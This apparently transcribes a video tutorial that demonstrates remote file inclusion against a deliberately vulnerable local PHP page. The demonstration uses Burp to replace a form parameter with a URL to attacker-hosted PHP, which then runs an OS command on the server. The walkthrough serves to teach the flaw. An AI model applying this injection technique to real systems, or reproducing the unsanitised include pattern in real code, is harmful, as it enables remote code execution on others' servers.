Okay, so let's take a quick look at an example of a code injection flaw. Here I have a very simple web page that I've created, sort of a web app. It says, please select which math constant you would like to see the value for. And it gives us three options, pi, tau, and e. So let's just select pi and click show me. And it shows me the value of pi. We'll go back and try the next one. Shows me the value of tau, which is 2 times pi. And the last one shows me the approximate value of e. So that's fine. That's how it's supposed to work. Let's click it one more time. So let's take a look at the request. So this web page is actually hosted on my local system. That's why it says localhost. And when we click show me, the data is sent to form_handler.php. And specifically what's sent is a parameter called selection, and its value in this case is pi.php. If we try tau, its value is tau.php, and if we try e, its value is e.php. So what's happening here? Let's take a look at the page source. Here's the HTML source for the page. You can see it's a very simple page. It basically just has an HTML form, and that's it. The form's action is form_handler.php, which means when we click this button, it's going to send whatever our selection is to form_handler.php. It happens to be using a GET request, which is okay because this is not sensitive information. There are 4 input elements. The last one is just the submit button. That's this one here. The previous 3 are radio buttons items. That's these 3 here, pi, tau, and e. They are all named selection. That's how radio buttons work. Every choice that you can make has to have the same name. But they have different values. And so those values are pi.php, tau.php, and e.php. So basically what happens when we select pi here and click show me is pi.php is the value for the selection parameter. Those both get sent to form_handler.php. We can take a quick look at that one. And you can see that form_handler.php is a very simple PHP program. It's only 2 lines of code. Basically all it does is get this value. So it says give me the value for the selection parameter. That's what this line of code right here does. So give me the value for the selection parameter. Well, that value in this case is going to be pi.php, puts that into the file variable. Then we include that file, pi.php. So that you can effectively read this as include pi.php or include tau.php or include e.php. When you include a PHP file, what happens is the include command basically tells the PHP interpreter go load that file and run whatever PHP code is in that file. So we can take a quick look at those files. Here's pi.php. It's very simple. It has 1 line of code. Echo the output of the pi function. So basically echo the value of pi. Tau.php, just about as simple, just gives us 2 times pi. And e.php defines a constant called e, and that's the approximate value of the natural logarithm number, and it just spits it out to the screen. So very simple. So basically, this page just tells form_handler.php which PHP file it should go get the contents from and run and execute, essentially. So where is the code injection vulnerability? Well, keep in mind that as an attacker, when I click this show me button, I can intercept it using my intercepting proxy, which is burp, which happens to be this one. I have a running copy, so that's this icon down here. And you can see that we're getting a little indicator telling me that the request is hanging. You see it didn't respond right away. That's because burp has caught the request, and here it is. It has very handily highlighted the parameter name and its value in color here. And so as an attacker, maybe what I want to do is change the value of this parameter from pi.php to something like http:// in this case merit.exposuresecurity.com/remote_file.txt. So basically what I'm saying is, no, don't load pi.php. Go to this website that I control and load this other file that contains a bunch of PHP code and run it on the web server. Which, if that sounds scary, that's a reasonable reaction because it is in fact pretty dangerous. So let's forward it, and we can already see that it's given us a response that looks like it did in fact go execute some code. So let's take a look at that actual file. So http merit.exposuresecurity.com/remote_file. It's actually called remote_file.txt. So let's see what it gives us. Let's turn off intercept. So here's the actual code from that file. You can see that it lives on a totally different system on the internet, right? Because we're supposed to be going to localhost, but this file lives out on merit.exposuresecurity.com. And it's basically some PHP code. It makes a bunch of echo statements, which, here we go, here's the output of those echo statements. And it also runs, so it tries to execute the system function. Remember, the system function will go and run an operating system level command. In this case, the command it's trying to run is called touch. And one of the things touch will do is if you tell it to, so if you give it the name of a file or path to a file, it will try to update the date and time on that file to whatever the current date and time is. But if it doesn't exist, it will actually create the file. And so let's go see if it actually created a file. So we'll go to temp, and systemd is putting it in a slightly different directory. It's actually here. And there it is. So it actually, that code created a file on our web server. And if the attacker had put some other commands in there, and like, you know, go add you know, maybe potentially try to exfiltrate some data, you know, open a connection to another system and maybe copy a file off or something like that. There are some fairly tricky things you could do. You know, once you have the ability to run operating system level commands and arbitrary code on someone else's server, it's really only a matter of time until something quite bad happens. So that's a sort of a contrived but simple example of a code injection vulnerability. And there are other ways that they can manifest themselves. This one happens to be a specific type that we call remote file inclusion, because we're forcing the web server to go and include some PHP code from some totally other system, you know, totally remote system. So hence the name remote file include. And that's pretty much it. This is one example of code injection.